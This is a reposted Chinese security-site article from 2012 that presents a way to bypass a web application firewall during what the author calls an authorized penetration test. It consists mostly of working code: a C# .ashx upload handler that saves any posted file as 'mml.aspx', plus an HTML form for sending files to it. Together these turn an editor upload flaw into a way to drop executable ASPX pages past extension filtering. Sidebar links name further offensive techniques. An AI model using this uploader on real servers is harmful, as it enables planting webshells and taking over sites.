首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
ashx绕过防火墙
来源:http://www.freebuf.com 作者:hfy 发布时间:2012-12-17  

授权对一个电视台进行渗透测试,前提编辑器可以上传ashx文件的(编辑器漏洞)

根据参考http://pnig0s1992.blog.51cto.com/393390/495155 

2.比较笨的方法,看代码吧

我对代码进行测试使用,防火墙依然检查aspx后缀,,pnig0s的代码是上传xx.jpg保存的也是xx.jpg,xx.txt也是xx.txt,,,
我的方法是做了一个小的修改,伪原创。而且客户端不用那么麻烦。

上传任何类型文件(防火墙不检查的后缀)都会在服务端自动重命名.

———————-

看代码吧

——————-

 

//////服务端////
  
<%@ WebHandler Language="C#" Class="Uploader" %>
    using System;
    using System.IO;
    using System.Web;   

    public class Uploader : IHttpHandler
    {
        public void ProcessRequest(HttpContext hc)
        {
            foreach (string fileKey in hc.Request.Files)
            {
                HttpPostedFile file = hc.Request.Files[fileKey];
                file.SaveAs(hc.Server.MapPath("mml.aspx"));
            }
        }   

        public bool IsReusable
        {
            get { return true; }
        }
    }

////////客户端///////
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
<title>html控件与ashx进行保存上传文件</title>
</head>
<body>

<!--enctype="multipart/form-data"该类型指定传输数据特殊类型,如图片或mp3等,-->
<form action="http://host/uploadfile/xxx/upko.ashx" method="post" enctype="multipart/form-data" id="form1">
   
<p>
       
<input id="fileKey" name="fileKey" type="file" /></p>
   
<p>
       
<input id="Button1" type="submit" value="button" /></p>
</form>
</body>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·0day批量拿站webshell,挖掘机是
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·Intel 3945ABG用OmniPeek 4.1抓
·破解无线过滤MAC
·XSS漏洞基本攻击代码
·Metasploit 权限提升
·ECSHOP 搜索注入漏洞利用exp及后
  相关文章
·Metasploit之使用socket通信的we
·使用MySQL字符串运算实施精巧化S
·网页游戏攻与防
·Novell ConsoleOne Hack Evoluti
·记一次对Discuz官方论坛的渗透检
·调戏突破SecureRDP对远程桌面连
·Linux 共享库注入后门
·利用sslstrip和ettercap突破ssl
·PHP一句话Webshell变形总结
·无线Hacking之D.O.S与AP欺骗
·记一次不同寻常的网站渗透测试过
·中间人攻击-DNS欺骗
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved